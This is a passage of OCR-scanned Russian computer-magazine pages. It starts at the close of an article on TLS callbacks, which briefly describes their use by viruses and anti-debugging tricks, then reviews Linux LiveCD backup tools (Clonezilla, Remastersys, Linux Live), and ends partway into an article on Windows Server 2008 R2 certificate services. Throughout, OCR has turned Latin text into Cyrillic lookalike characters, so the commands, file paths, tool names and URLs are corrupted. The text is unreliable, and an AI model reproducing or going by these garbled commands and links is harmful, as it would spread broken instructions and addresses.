другие калбэки во время исполнения. 

ИЗ используется в большом количестве протекторов, защит, вирусов, 
сгаскте и прочих программ, находящихся в сфере наших с тобой общих 
интересов. ВІаскІідЫ: используют некоторые антиотладочные приемы, 
начинающиеся с создания саІІЬасктаблицы ИЗ (ТЬгеаб БосаІЗіюгаде). 
ВІаскІідЬЕз ИЗ са ІІЬаск пытается обмануть отладчик, создавая копию 
главного процесса (Іюгк) до того, как объект процесса полностью создан. 
Некоторые вирусы внедряются исключительно путем модифицирова- 
ния всего четырех байт — указателя на ЛЗ-та блицу, расположенную в 
памяти (в одной из системных ОН], где находится указатель на команду 
передачи управления на зНеІІ-код. 

Конечно, подобная техника внедрения работает только натой версии 
операционной системы, под которую она заточена, но антивирусы таких 
вирусов не обнаруживают. Или вообще не обращают внимания на из- 
менение бігесіюгу {аЫе. 

Кстати, если тебя интересует использование ИЗ в качестве антиот- 
ладочного приема — подробности читай в отличной статье К. Касперски 
«Исчерпывающее руководство по приготовлению и взлому ИЗ» [ ЬНр:// 
ѵѵѵѵѵѵ.хакер.ги/ппадагіпе/ха/І 1 8/080/1 .азр ). 

Заключение 

Будем надеяться, что прочтение этой статьи смогло сделать тебя про- 
двинутым пользователем компьютера. А что делает продвинутый поль- 
зователь? Берет отладчик и ковыряетвсе подряд. От этого он становится 
еще более продвинутым пользователем :). В общем, двигайся вперед, 
читай ][, и да пребудет стобой Сила! □с 
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ЗУИ/АСК 



■ ■ Денис Колисниченко сІМзіІаЬзгатаіІ.ги 



«Живой» бэкап 

линуксового 

сервера 

ОБЗОР СРЕДСТВ ДЛЯ РЕЗЕРВНОГО КОПИРОВАНИЯ И СОЗДАНИЯ 

иѵЕоѵо/иѵЕозв 

Всемыпомним(любимискорбим)о добром привидении от Нортона — 
ІМогІоп ѲЬозЬ В мире ѴѴіпбоѵѵз его можно считать незаменимым (хотя в 
конкурентах недостатка нет — прим. ред.). В этой статье мы поговорим 
о средствах резервного копирования для твоего любимого ту кса. Более 
того, все рассматриваемые средства позволяют создать не просто ре- 
зервную копию системы, а ЬіѵеСО/ВѴВ. 



ЗАЧЕМ НУЖНО ВСЕ ЭТО? 

Для начала определимся, зачем админу средства для создания ЬіѵеСБ. 
Наша цель — резервное копирование системы, но причем здесь ЬіѵеСБ? 
Оказывается, это довольно удобно. Мы убиваем вот сколько зайцев 
сразу: 

• Создаем средство для восстановления системы. Предположим, ты 
настроил свою систему, поднял все сетевые службы, отредактировал 
ихконфиги. Но завтра из-за очередного перепада напряжения сгорел 
винт. Опять все заново настраивать? Если ты накануне создал ЬіѵеСБ, то 
тебе нечего беспокоиться. Заменил винт, загрузился с ЬіѵеСБ (конечно, 
это будет ЬіѵеБѴБ, но по старинке мы здесь и далее будем называть его 
ЬіѵеСБ) и установил систему вместе со всеми параметрами на новый 
винт. И все! На всю эту операцию будет потрачено полчаса. Пользовате- 
ли и начальство будут тебе благодарны за столь оперативное «воскре- 
шение» сервера. А теперь представь, что ты создал обычный бэкап с 
помощью гагД§ 2 . Тебе нужно минимум 40 минут на установку системы, 
потом время на восстановление бэкапа, плюс один лишний ребут. Одно- 
значно времени будет потрачено больше. 

• Создаем средство для клонирования системы. Когда предприятие 
покупает компьютерный парк, то, как правило, все компьютеры одно- 
типные (исключение составляют, разве что, серверы — они должны 
быть мощнее, и компьютеры начальства — у них должна быть мощная 
видеокарта :)) . Вот теперь представь, что тебе нужно настроить каждый 
новый компьютер. А их может быть 10, 20, 50! Можно поступить проще. 
Настроить один компьютер, создать бэкап в виде ЬіѵеСБ и «развернуть» 
этот бэкап на всех остальных компах сети. Пусть настройка одного 
компьютера займет полтора часа (установка системы + настройка), 
создание ЬіѵеСБ — еще минут 30 (тут все зависит от способностей 
компьютера, потому что от тебя требуется ввод всего одной команды), 
затем запись образа на болванки. Да, именно на «болванки», потому 
что тебе нужно будет создать несколько копий ЬіѵеСБ, чтобы ты смог од- 
новременно устанавливать систему на несколько компьютеров. Затем 



еще минут 40 ожидания, и сразу будет настроено N компьютеров, где 
число N зависит от количества имеющихся болванок. Удобно? Думаю, 
да. Без ЬіѵеСБ ты бы потратил полтора часа на каждый компьютер. 10 
компов = 15 часов (два рабочих дня) . А так ты настроишь эти 10 компов 
примерно за четыре часа. Остальное время можно делать вид, что 
настраиваешь компы, и ничего не делать. А время идет, зарплата на- 
числяется! И еще — созданные «клоны» системы можно использовать в 
будущем, если компьютерный парк будет расширяться. 

• Возможность создания ЬіѵеЫЗВ — загрузочная живая флешка понадо- 
бится для восстановления/клонирования операционки нетбука и дру- 
гих компов, где нет БѴБ -привода. Средства создания ЬіѵеСБ позволяют 
также создать и загрузочную флешку. 

Не нужно думать, что бэкап в виде ЬіѵеСБ может использоваться только 
для копирования/восстановления файлов самой системы. Можно 
копировать и пользовательские данные из /йоте, лишь бы их размер не 
превысил размера БѴБ-диска. Хотя можно использовать двухслойные 
диски (двухсторонние использовать не удобно), что позволит увели- 
чить объем резервируемой инфы. 

КАКИЕ СРЕДСТВА МЫ БУДЕМ РАССМАТРИВАТЬ? 

Самым мощным средством для клонирования твоего тукса является 
Сіопегіііа. Этот продукт может не только создать ЬіѵеСБ, но и раз- 
вернуть систему по сети. На сайте разработчиков Ытр: //сіопегіііа. 

можно найти следующую информацию: за 10 минут Сіопегіііа 5Е 
развернул по сети образ 5,6 Гб на 41 компьютер сети. В итоге все компы 
были настроены всего за 10 минут. Правда, для такой сетевой установки 
нужно развернуть специальный сервер, но об этом позже. Кроме того, 
Сіопегіііа может использоваться для бэкапа компьютеров, работающих 
под управлением ѴѴіпс1о\ѵ5 и ЕгееВЗБ. 

Если тебе не нужно такое мощное средство, можно ограничиться утили- 
той Кетазгегзуз Васкир ( Ьнр://дллллѵ.^еексоппесі:іоп.ог^/гета5і:егзу5/ ) . 

Правда, эта утилита рассчитана только на БеЬіап и ЬПэипш (а также на 
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другие дистрибутивы, основанные на Бебіап) , поэтому она не подойдет 
тебе, если ты используешь, скажем. Ребога или Мапбгіѵа. 

Любителям Зіаскѵѵаге подойдет скрипт Ілпих Біѵе ( р://\ѵтѵ.1іпих- 
Ііѵе.опг) . Этот скрипт позволяет создать как ЬіѵеСЭ, так и ІлѵеІІ5В. 
Почему именно 5Іаскѵѵаге описан в этой статье? Да потому что этому 
отличному дистрибутиву почему-то уделяется мало внимания на фоне 
«попсовых» дистров вроде ІЛэипш. 

Подобные утилиты можно найти и для других дистрибутивов, напри- 
мер, утилита ткііѵесб (подобна Кетазіегзуз Васкир) используется для 
создания БіѵеСП на базе Мапбгіѵа. Вот, пожалуй, мы и назвали самое 
главное. Рассмотреть абсолютно все подобные утилиты мы не можем — 
журнал-то ведь не резиновый. 

СІ.0ЫЕ2ІІ.І.А: БЕСПЛАТНЫЙ АНАЛОГ МОНТОЙ 6Н0БТ 

Сіопегіііа — программа непростая, сейчас мы рассмотрим лишь 
один из примеров ее использования (а именно — создание ІлѵеСО и 
восстановление системы с его помощью), а познакомиться с остальны- 
ми возможностями программы можно в документации или на сайте 
разработчиков. 

Итак, для создания/восстановления бэкапа нужно выполнить следую- 
щие действия: 

1. Скачай с Ьнр: //сІопегіІІа.ог^/боѵѵпІоабЛоигсеіог^е/ 150-образ 
Сіопегіііа Ьіѵе и запиши его на болванку; 

2. Загрузись с болванки Сіопегіііа Ьіѵе, загрузочное меню представлено 
ниже. Нужно выбрать команду Сіопегіііа Ііѵе. Если возникнут проблемы 
(например, с видеокартой), можно выбрать команду Оіііег тобез оі 
Сіопегіііа Ііѵе и выбрать другой режим загрузки Сіопегіііа. Ты увидишь 
процесс загрузки БеВіап — тут все как обычно, нужно просто подож- 
дать; 

3. Далее нужно выбрать язык. Русского, к сожалению, пока не пред- 
видится. Далее нужно выбрать раскладку клавиатуры, но так как 
раскладку изменять нам не нужно (а зачем?), выбери вариант «Поп'і 
іоисЬкеутар»; 

4 . Выбери команду «Зіагі: Сіопегіііа»; 

5. Выбери режим беѵісе-іта^е: создание файла образа раздела. Режим 
беѵісе-беѵісе используется для бэкапа раздела, при этом сам бэкап будет 
помещен на другой раздел; 

6. Далее нужно выбрать, куда будет сохранен образ, или откуда он будет 
прочитан (в случае восстановления системы по образу) . Выбери 1оса1_ 
беѵ, что означает локальное устройство. Также образ можно получить 
(или записать) по 55Н, ИЕ5 (Ыеіѵѵогк Рііе Зузіет, а не №еб Рог Зрееб!) и 
из сети М5 ѴѴіпбоѵѵз (затЬа_5егѵег) ; 



7. Далее нужно выбрать раздел, где будут храниться образы. Если ты 
создаешь образ, то на этот раздел он будет сохранен, а если восстанав- 
ливаешь образ, то Сіопегіііа будет искать его на этом разделе; 

8. Далее нужно выбрать одну из команд. Команда заѵесіізк используется 
для сохранения всего диска, заѵерагіз — для сохранения одного или 
нескольких разделов диска, гезіогесіізк — для восстановления образа 
диска на локальный диск, гезіогерагіз — для восстановления образа 
раздела, команда гесоѵегу-ізо-гір используется для создания «живого» 
диска восстановления; 

9. Если ты выбрал команду восстановления образа, то далее нужно 
выбрать образ, который нужно использовать; 

10 . Вводим устройство (имена устройств соответствуют именам уст- 
ройств в Ілпих), на которое нужно развернуть образ. Будь внимателен, 
чтобы не развернуть образ раздела на весь диск — потеряешь осталь- 
ные разделы! 

11. Если ты выбрал команду гесоѵегу-ізо-гір для создания ІлѵеПѴТ)/ІІ8В, 
то нужно также выбрать режим: ізо — будет создан образ для записи 
на ЭѴЭ, гір — образ для записи на БіѵеШВ, ЪоіЬ — будут созданы оба 
файла, которые могут использоваться впоследствии для создания как 
БіѵеЭѴЕ), так и ІлѵеІІЗВ. Созданный файл (файлы) будет сохранен в 
каталоге Люте/раПлта^. 

Вот и все! Как видишь, все довольно просто. Программа работает с 
устройствами (дисками, разделами) напрямую, поэтому при создании/ 
восстановлении бэкапа все равно, под какой операционной системой 
работает компьютер. 

КЕМА5ТЕК5Ѵ5 ВАСКІІР: БЭКАП ДЛЯ ОЕВІАМ/иВІЖТи 

В отличие от Сіопегіііа, которая напрямую работает с устройствами, 
Кетазіегзуз Васкир устанавливается на компьютер, работающий под 
управлением ОеЪіап или ІЛэипш, запускается под управлением этой 
операционной системы и создает 150-образ системы, под управлением 
которой она запущена. 

Порядок работы с Кетазіегзуз следующий: ты настраиваешь свою сис- 
тему, устанавливаешь Кетазіегзуз, запускаешь Кетазіегзуз, создаешь 
150-образ, который потом нужно будет записать на болванку. 

Первым делом установим Кетазіегзуз. Открой файл зоигсез.Нз!: 

зисіо папо /еЬс/арЬ/зоигсез . ІізЬ 

Добавь в него следующую строку: 

# Если у тебя установлен СШВ ѵі 



ХАКЕР 10/141/ 10 



► 123 






5ѴМ/АСК 




Загрузочное меню Сіопегіііа Ыѵе 




беЪ Ьббр: //ѵллплпдеексоппесбіоп.огд/ гешазбегзуз/ 
герозібогу иЪипби/ 

# Если у тебя установлен СКІЛ32 

беЪ Ьббр: //ѵллпльдеексоппесбіоп.огд/гетазбегзуз/ 
герозібогу кагшіс/ 

Сохрани файл и введи две команды: 

зибо арб -дек ирбабе 

зибо арб-деб іпзбаіі гешазбегзуз 

Формат вызова гетазГегзуз следующий: 

зибо гешазбегзуз Ьаскир I сіеап | бізб [сббз I ізо] 

[ бііепате . ізо] 

Пройдемся по опциям: 

• Ьаскир — создание резервной копии дистрибутива, включая пользо- 
вательские данные (каталог /Ьоте) ; 



Основные 

особенности 

Сіопегіііа 

• Полностью бесплатна (распространяется по лицензии 
СРЬ); 

• Поддерживает файловые системы Ехі 2 , Ехіз, ЕХІ 4 , КеізегРБ, 
Кеівег 4 , ХР 8 , ЛБ 8 , РАТ, ШТ 8 , НР 8 (Мас08), ИР 8 (РгееВ 8 Б, 
МеГОЗБ, ОрепВ 8 Б), ѴМР 8 (ѴМѴѴаге Е 8 Х), поэтому ты можешь 
клонировать не только Ілпих, но и М 8 ѴѴіпс1о\ѵ8, Мае 08 
(Іпіеі), РгееВ 8 Б, N61:680 и 0репВ80; 

• Поддержка ЕѴМ 2 (ЕѴМ ѵег і не поддерживает); 

• Поддержка ОІШВ версий і и 2 ; 

• Версия Сіопегіііа 8 Е ( 8 егѵег ЕбШоп) поддерживает 
МиШсавІ: для массового клонирования по сети, при условии, 
что компьютеры поддерживают РХЕ и ѴѴаке-оп-ЦШ; 

• Сіопегіііа может сохранить не только отдельно взятый раз- 
дел, но и весь жесткий диск со всеми разделами. 



• сіеап — удаление временных файлов, которые образуются в процессе 
создания дистрибутива. Обязательно введи эту команду после создания 
дистрибутива (для экономии места), но только после того, как скопиру- 
ешь образ дистрибутива в другой каталог, иначе он тоже будет удален; 

• сПз* — создание дистрибутивного образа. То же самое, что и Ьаскир, но 
без копирования пользовательских данных из каталога /Ьоте; 

• с<Ш — создание файла с файловой системой без создания 150-образа 
(подходит, если хочешь создать 150-образ другой программой) ; 

• ізо — используется по умолчанию, создает 150-образ дистрибутива; 

• [Шепате .ізо] — последний параметр, задает имя 150-образа, файл 
помещается в каталог /Ьоте/гетазиегзуз. 

Мне больше нравится опция Ьаскир, поскольку при создании образа 
сохраняются и настройки пользователя, в том числе меню, графичес- 
кая тема, фон рабочего стола. Но только убедись, чтобы в домашнем 
каталоге не было ничего лишнего (того, что может увеличить размер 
образа, например, музыка, видео) . 

Если тебе больше нравится СШ, то можешь использовать СШ-версию 
программы (ничего особенного она из себя не представляет — только 
окошко с прямоугольными некрасивыми кнопками, позволяющими 
запустить ту или иную функцию программы) . Запустить ее можно 
командой 

зибо гешазбегзуз-диі 

Для создания ЬіѵеІбЗВ в ЕПэипш используется стандартная програм- 
ма, запустить которую можно командой Система-^ Администриро- 



Ссылки 

• Ьббр: / /сіопегіііа . огд/сіопегіііа-зегѵег-ебібіоп/ — 
использование Сіопегіііа Зегѵег Ебібіоп 

• Ьббр : / /ѵгѵт. сѵЬегсібі . Ьіг/бірз/боѵтіоаб-ііпих- 
сіопегіііа-бо-сіопе-зѵзбет. Ьбті — обзор Сіопегіііа (для 
общего развития) 

• Ьббр : / /ѵ?ікі . сепбоз . огсг/Нотл/Гоз /РХЕ /Сіопегіііа — как 
настроить СІопегіІІа/ВКВЬ-сервер на базе СепбОЗ/Еебога 

• Ьббрз : /,/ідікі . ебгіЬппби . ога/ 

ЗеббіпдЦрСІопегіІІаРКВЬопЦЬипби — как настроить 
СІопегіІІа/ВВВЬ-сервер на базе ЕПзипби 

• 

Ьбті — использование Кетазбегзуз в Шзипби 
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Выбор языка Сіопегіііа 




Выбор раскладки 



вание -> Создание загрузочного ИЗВ-диска. Запусти ее, подключи 
флешку (4 Гб или больше, 2 Гб будет маловато) и нажми кнопку 
«Маке зіагШр сіізк». Через некоторое время загрузочная флешка 
будет готова. 



№к № и&*: 

Оешсе иЬеі. Сарасііу Ре ее Ёрасе 

^ Дкгѵ^гіЬ 1,9 
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НСІр СІ05С 

Программа для создания ЫѵеІІБВ 



У НЦХ УѴЕ: БЭКАП В 5І.АСКѴѴАКЕ 

Теперь очередь дошла и до Зіаскѵѵаге. Очень хороший дистрибутив, 
пусть и не такой удобный, как ІЛэипш, зато очень надежный. Для созда- 
ния ІіѵеСО в Зіаскѵѵаге выполни следующие действия: 

• Собери (если ты еще этого не сделал) модули ядра: аиіз, зциазМз. 

Если собирать ядро лень, его можно заполучить в готовом виде на 
сайте Ііпих Ііѵе ( : го: //ѵ\лл/ѵѵ.1іпих-1іѵе.огу ) . Правда, доступно ядро 
версии 2.6.27.2 7 — не самое новое и для архитектуры І486, но обычно 
Зіаскѵѵаге не устанавливается на самые новые компы с 64-разрядными 
процессорами. В Зіаскѵѵже 13 используется 2.6.33, поэтому, возможно, 
тебе захочется собрать ядро вручную, чтобы в твоем Ііѵе С И исполь- 
зовалась последняя версия ядра. Все необходимое для сборки (аиіз, 
зциазМз и Ігта) ты найдешь на сайте Ііпих Ііѵе; 

• Удали все лишнее, например, лишние тап'ы, чтобы уменьшить раз- 
мер дистрибутива; 

• Скачай скрипты Ііпих Ьіѵе с Ьнр: //ѵѵѵѵѵѵ.ііпих-ііѵе.огу и распакуй их 
в Атр; 

• Отредактируй .сопй§, если хочешь изменить переменные по умолча- 
нию; 

• Запусти ./ЬиіЫ (находится в Атр ) с правами гооі. В результате поя- 
вится каталог с данными ІіѵеСО — Атр/1іѵе_сІаі:а_ИИИ]М, где ИИИИ 
— случайное число; 

• Запусти таке_І 50 . 5 Іі, если хочешь создать 150-образ или Ъооііпзі.зіі 
для создания ІіѵеІЛЗВ. 

5 II ММ АВУ 

Итак, какую прогу выбрать? Если у тебя установлена БеЫап или 
ІЛэипш, самым простым вариантом будет использование Кетазіегзуз 
Васкир. Для бэкапа компов, работающих под самыми разными ОС, 
подойдет Сіопегіііа — наверное, лучший выбор для админа. А вот 
фанатам Зіаскѵѵаге должны понравиться скрипты Ьіѵе, но учитывая, что 
нужно будет перекомпиливать ядро, наверное, проще будет использо- 
вать Сіопегіііа для бэкапа слаки. т 
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ЗУИ/АСК 



■ ■ Лучник Анна ІисІіпікгаіЬипіѵеггіІу.ги, ѵѵѵѵѵѵ.іІ-ипіѵег5І1у.ги 



Что нового 
вАОСБ? 

СЕКТІРІСАТЕ 5ЕВѴІСЕ5 

В ѴѴШ00ѴѴ5 5ЕВѴЕВ 2008 В2 Ѵ5. ѴѴІЫ00ѴѴ5 БЕВѴЕВ 2003 

Как известно, сертификаты нужны для надежной аутентификации, со- 
здания 851-соединений, отправки 5/МІМЕ-сообщений и других дейс- 
твий, направленных на обеспечение безопасности. С каждым годом 
использование сертификатов растет, и для того, чтобы удовлетворять 
новым требованиям, Місгозоіі довольно серьезно переработала старую 
службу Сегіііісаіе Зегѵісез. 



В ѴѴіпсІоі/ѵ8 Бегѵег 2008 службы сертификации теперь относятся к 
службам Асгіѵе Бігесгогу. Мы можем установить роль Асгіѵе Бігесгогу 
СеітШсаГе Зегѵісез (АБ С5) и на сервер, не входящий в домен, но часть 
функций при этом будет недоступна. Например, для управления 
шаблонами требуется контроллер домена, так как шаблоны хранятся 
на нем. В состав роли АБ С5 в ѴѴіпбоѵѵз Зегѵег 2008 К2 входит шесть 
компонентов: 

1. СепШсагіоп аіпіюгігіез (САз) - этот компонент позволяет установить 
и настроить корневой (гоог) или подчиненный (зиЪогбіпаГе) центры 
сертификации (они же «удостоверяющие центры»), которые служат 
для выдачи сертификатов пользователям, компьютерам и службам. 

2. ѴѴеЪ ептПтеш необходим для запроса сертификатов и получения 
информации об отозванных сертификатах через веб-браузер. 

3. ОпНпе Кезропбег позволяет клиентам получать информацию о ста- 
тусе одного сертификата без получения списков отзыва. 

4. ЫеізлгогкБеѵісе Епгоіітепі: Зегѵісе (ЫБЕЗ) используется маршрути- 
заторами и другими сетевыми устройствами без учетных записей в 
домене для получения сертификатов. Служба подачи заявок на сетевые 
устройства использует протокол 5СЕР (Зітріе СегйЯсаГе Епгоіітепі: 
Ргогосоі), который был разработан Сізсо. Расширение ЫБЕЗ для 115 
конфигурируется через ключи реестра НКЕУ_ШСАЬ_КООТ\ЗоЙ:\ѵаге\ 
Місго5обг\Сгурю§гарІіу\М5СЕР. 

5. Сеггійсаге Епгоіітепі: ѴѴеЪ Зегѵісе позволяет клиентам автоматичес- 
ки подавать заявки на сертификаты и получать их по НТТР5. 

6. СеггіЯсаГе Епгоіітепі: Роіісу ѴѴеЪ Зегѵісе позволяет определить поли- 
тики для автоматической регистрации сертификатов и передавать их 
клиентам по НТТР5. В то время, как ѴѴеЪ Зегѵісе получает информацию 
о политиках из АБ по протоколу ЬБАР. 

В предыдущих версиях ѴѴіпбоѵѵз Зегѵег в состав Сегйбісаге Зегѵісез вхо- 
дили только первые два компонента, которые назывались СеггіЯсаГе 
Зегѵісез СА и СепШсаГе Зегѵісез ѴѴеЪ Епгоіітепі: Зиррогі:, а последние 
два компонента появились только в ѴѴіпбоѵѵз Зегѵег 2008 К2. 
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ВАРИАНТЫ УСТАНОВКИ И УПРАВЛЕНИЯ АО СБ 

АБ С5 нельзя установить на Капіит редакции ѴѴіпбоѵѵз Зегѵег 2008, а 
на Зегѵег Соге все компоненты АБ С5 можно устанавливать, начи- 
ная с ѴѴіпбоѵѵз Зегѵег 2008 К2. Довольно серьезные ограничения по 
использованию АБ С 5 присутствуют и в стандартной редакции Зегѵег 
2008 (возможность установки только компонента СА, невозможность 
использовать Кезітісгеб Епгоіітепі: А§ет и другие новшества), часть из 
которых были сняты в К2 (наконец в стандартной редакции появи- 
лась возможность работать с шаблонами сертификатов версий выше 
первой). 

Все компоненты можно поставить на один сервер, но рекомендуется 
разносить СА, ОпНпе Кезропбег и ѴѴеЪ епгоіітепі: на различные серве- 
ра. Для полноценной работы АБ С5 требуется АБ Б5 (Асгіѵе Бігесгогу 
Ботаіп Зегѵісез) . При этом можно обойтись без обновления схемы 
- АБ С5 в Зегѵег 2008 и в Зегѵег 2008 К2 будет работать и на схеме, 
которая поставляется с ѴѴіпбоѵѵз Зегѵег 2003. Но для работы Сеггійсаге 
Епгоіітепі: ѴѴеЪ Зегѵісез уже необходима схема не ниже 47 версии, 
которая идет с ѴѴіпбоѵѵз Зегѵег 2008 К2. Для работы большинства ком- 
понентов также требуется ИЗ. 

Установка АБ С5 производится через добавление ролей в оснастке 
Зегѵег Мапа^ег. Как и раньше, для настройки параметров установки 
применяется конфигурационный файл САРоІісу.іпГ, который должен 
находиться в %5У5ТЕМКООТ%. Если необходимо установить на сервер 
два компонента Сеггійсагіоп АщЪогйу и Сеггійсаге Епгоіітепі: ѴѴеЪ 
Зегѵісе, то это надо делать в два этапа, так как при установке СА нельзя 
выбрать для установки компонент ѴѴеЪ Зегѵісе. 

В ѴѴіпбоѵѵз Зегѵег 2008 были добавлены новые СОМ-объекты (подроб- 
ную информацию о свойствах ІСепЗгѵЗеШр можно найти на МЗБЪГ) , 
которые можно использовать для установки СА. Например, можно 
автоматизировать установку и настройку с помощью ѴВЗсгірі:. 

Службы сертификации являются хорошими кандидатами на виртуа- 
лизацию. Но при этом очень важно обеспечить необходимый уровень 
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безопасности для закрытых ключей. Этого можно достичь, используя 
аппаратные криптографические модули (Н5М) . В этом случае, даже 
если виртуалка целиком попадет к злоумышленнику (например, из 
резервной копии), то закрытые ключи не будут потеряны и не придется 
перестраивать всю инфраструктуру, так как ключи останутся в Н5М. 
МІСГ050ІТ официально поддерживает виртуализацию служб сертифи- 
кации начиная с ѴѴіпсіоѵѵб 5егѵег2003 5Р1. 

Для управления и настройки АЭ С5 можно использовать ММС-оснас- 
тки, скрипты или командную строку. Большая часть инструментов 
существовала и в предыдущих версиях, таких как оснастки СепШсаіез 
(сегйп^г.тзс), Сеггійсагіоп Атііогпу (сегізгѵ.тзс) и СепШсаіе 
Тетріаіез (сегнтрі.тзс), утилиты сегшШ.ехе и сегйэд.ехе. Добавилась 
оснастка ОпНпе КезропбегМапа^етеШ: (осзр.тзс) для управления 
одноименным компонентом. Кроме того, в состав ОС вошла оснаст- 
ка Ешегргізе РКІ (ркіѵіеѵѵ.тзс), которая ранее была частью ѴѴіпбоѵѵз 
Зегѵег 2003 Кезоигсе Кп и называлась РКІ НеакЬ. Тооі. 

Епііегргізе РКІ позволяет одновременно отслеживать состояние и 
доступность нескольких СА, проверяет статус сертификатов СА, до- 
ступность АІА (АіпЬогку ІпГогтаіііоп Ассезз) и списков отзыва. С помо- 
щью разноцветных отметок можно судить о доступности и состоянии 
РКІ. Ркіѵіеѵѵ удобно использовать, когда в организации развернуто 
несколько СА, и информацию о них можно получить из нескольких 
источников, работающих по различным протоколам. 

Некоторые изменения произошли и в резервном копировании АЭ С5 
в Зегѵег 2008 К2. Так как закрытые ключи теперь хранятся в скрытой 
папке %8У8ТЕМЭКІѴЕ%\Рго§гатЭаі;а\Місго5ок\Сгурі;о\Кеу5, к 
которой можно получить доступ через %5У5ТЕМБКІѴЕ%\ІІ5ег5\АІ1 
ІІзегзХМісгозокХСгурііоХКеуз, то они не попадают в резервную копию 
состояния системы. Чтобы можно было восстановить или мигрировать 
СА при создании и использовании в качестве резервной копии Зузіет 
Зіаіе Васкир, надо еще создать резервную копию закрытых ключей. 

Для этого можно воспользоваться командой сегшШ -ЪаскирКеу 
<путь_для_резервной_копии> или оснасткой Сеггійсагіоп АіпЬогку. 

ШАБЛОНЫ СЕРТИФИКАТОВ 

С помощью шаблонов сертификатов можно определить формат и 
содержимое издаваемого сертификата, а также задать разрешения 



на запрос сертификатов для пользователей и компьютеров. Только 
Епііегргізе С А могут использовать шаблоны сертификатов. В ѴѴіпсІоѵѵз 
Зегѵег 2000 присутствовали только шаблоны первой версии, которые 
нельзя изменять - иначе говоря, можно использовать только те шабло- 
ны, которые идут в составе ОС и задавать для них только разрешения 
на выдачу сертификатов. Шаблоны второй версии поддерживают 
восстановление и архивацию ключей, и автоматическую выдачу сер- 
тификатов (сеггійсаіе аіпюепгоіітепіі) и были представлены в ѴѴіпсІоѵѵз 
5егѵег2003. 

В ѴѴіпсІоѵѵз Зегѵег 2008 появились шаблоны версии 3, главная новая 
возможность которых -работа с СЫС (Сгурію^гарЬу Ыехі Сепегагіоп) . 
СЫС - это замена СгуріоАРІ, в которой реализована поддержка алго- 
ритмов из СгуріоАРІ 1.0 и поддержка ранее неподдерживаемых крип- 
тографических алгоритмов, среди которых алгоритмы ЭЦП и обмена 
ключами на основе эллиптических кривых, а также дополнительные 
алгоритмы хеширования. Стоит отметить, что использование сер- 
тификатов на основе Ы5А 5ике В Сгуріо^гарЬу (к которым относятся 
алгоритмы на основе эллиптических кривых) поддерживается только 
ОС, начиная с ѴѴіпсІоѵѵз Ѵізііа. То есть нельзя, например, использовать 
сертификат с ключом для алгоритма, использующего эллиптические 
кривые, в ѴѴіпбоѵѵз ХР и ѴѴіпбоѵѵз Зегѵег 2003, хотя можно использовать 
классические алгоритмы, такие как К5А, даже если ключ был сгене- 
рирован с использованием СЖТ Использование шаблонов третьей 
версии для работы со смарт-картами также затруднено, так как С5Р 
(Сгуріо^гарЬу Зегѵісе Ргоѵібег) для смарт-карт не поддерживают новые 
алгоритмы СИС. 

Вторая и третья версии шаблонов поддерживаются в редакциях 
Епііегргізе и Баіасепііег. В редакции Зіапбагб новые версии шаблонов 
поддерживаются только в Зегѵег 2008 К2. Сертификаты по шаблонам 
третьей версии можно издавать и на СА на ѴѴіпбоѵѵз Зегѵег 2003. 

В ѴѴіпбоѵѵз Зегѵег 2008 К2 и ѴѴіпбоѵѵз 7 был добавлен интерфейс 
программирования (СегіШсаіе Тетріаіе АРІ), который позволяет 
при установке приложения добавлять новые шаблоны сертификатов. 
Данная возможность может очень пригодиться, например, в такой си- 
туации: разработчики пишут приложение, которое использует серти- 
фикаты с нестандартными расширениями. Раньше надо были писать 
подробные инструкции для администраторов, чтобы они создали в 
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своей системе необходимый шаблон. Теперь можно добавить новый 
шаблон программно с помощью импорта предварительно экспорти- 
рованного шаблона, созданного в тестовой среде. Шаблон необходи- 
мо создавать через стандартную оснастку сегШпрІ.тзс, чтобы быть 
уверенным, что он не нарушает огромное количество ограничений, 
которые накладываются на сертификаты (например, разрешение 
архивирования ключей только для сертификатов, которые использу- 
ются для шифрования) . 

НОВЫЕ СПОСОБЫ ЗАПРОСА СЕРТИФИКАТОВ 

Кстати, а каким образом пользователи и компьютеры получают серти- 
фикаты? Иначе говоря, как они могут подавать запрос на сертификат 
и устанавливать его на компьютер? Можно, конечно, руками создать 
РКС5#10 запрос и с помощью командной строки и сегпэд передать 
запрос на СА, но не всегда есть возможность объяснить пользователям, 
как это сделать. Если пользователь доменный и подключен к корпо- 
ративной сети, то можно с помощью групповых политик настроить 
автоматическую подачу и обработку заявок. В результате пользователь 
может даже не подозревать, что ему был установлен новый сертификат 
или обновлен старый. 

Клиенты, которые не входят в домен или не имеют прямого доступа в 
сеть с СА, могут запросить сертификат через веб-интерфейс. Компо- 
нент ѴѴеЬ ЕпгоПтеш, который необходим для этого, присутствовал и 
ранее, но был существенно переработан. Старая библиотека ХЕпгоП.сШ, 
которая была написана много лет назад и долго дополнялась новыми 
функциями и багами, была заменена на новую - СеПЕпгоІІ.бП, так 
как оказалось легче написать с нуля, чем исправить то, что было. ѴѴеЬ 
ЕпгоПтет позволяет подавать заявки в формате РКС5 #10 или созда- 
вать запросы интерактивно через браузер, автоматическая подача 
заявок не поддерживается. 

В ѴѴіпбоѵѵз Зегѵег 2008 и более ранних версиях для аутентификации 
пользователей и компьютеров при запросе сертификатов исполь- 
зовался протокол КегЪегоз, а в качестве транспортного протокола 
- ПізйгіЪиіеб СОМ (БСОМ) . При таком способе аутентификации 
автоматическая подача заявок (атоепгоПтет) недоступна для ком- 
пьютеров, которые не подсоединены к корпоративной сети, или для 
компьютеров, которые находятся в другом лесе, чем центр сертифика- 
ции. С А ѴѴеЬ ЕпгоПтепі;, появившийся в Зегѵег 2008 К2, использует для 
подачи заявок новый протокол ѴѴЗ-Тгизі. Новые сервисы - Сеггійсане 
ЕпгоПтепі: Роіісу ѴѴеЬ Зегѵісе и Сеггійсане ЕпгоПтет ѴѴеЬ Зегѵісе - 
позволяют получить политики и подать заявки на сертификаты через 
НТТР5. При этом в качестве аутентификации можно использовать не 
только КегЪегоз, но и пароли, и сертификаты. 

Если необходимо избежать запросов к СА на новые сертификаты из 
интернета, но есть клиенты, которым надо обновлять сертификаты, 
когда они, например, в командировках, то можно использовать режим 
только обновления (гепеѵѵаі-опіу) . В этом случае клиенты при первом 
получении сертификата должны быть в той же сети, что и С А, а в случае 
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Установка служб Сегіііісаіе ЕпгоПтепі ѴѴеЬБегѵісез 

обновления сертификатов могут воспользоваться возможностями СА 
ѴѴеЬ ЕпгоПтепі:. 

Политики для этих служб настраиваются через групповые политики 
или на клиенте, через оснастку СепКісаіез. 

СПИСКИ ОТЗЫВА Ѵ5. ОЫУЫЕ КЕ5Р0Ы0ЕК 

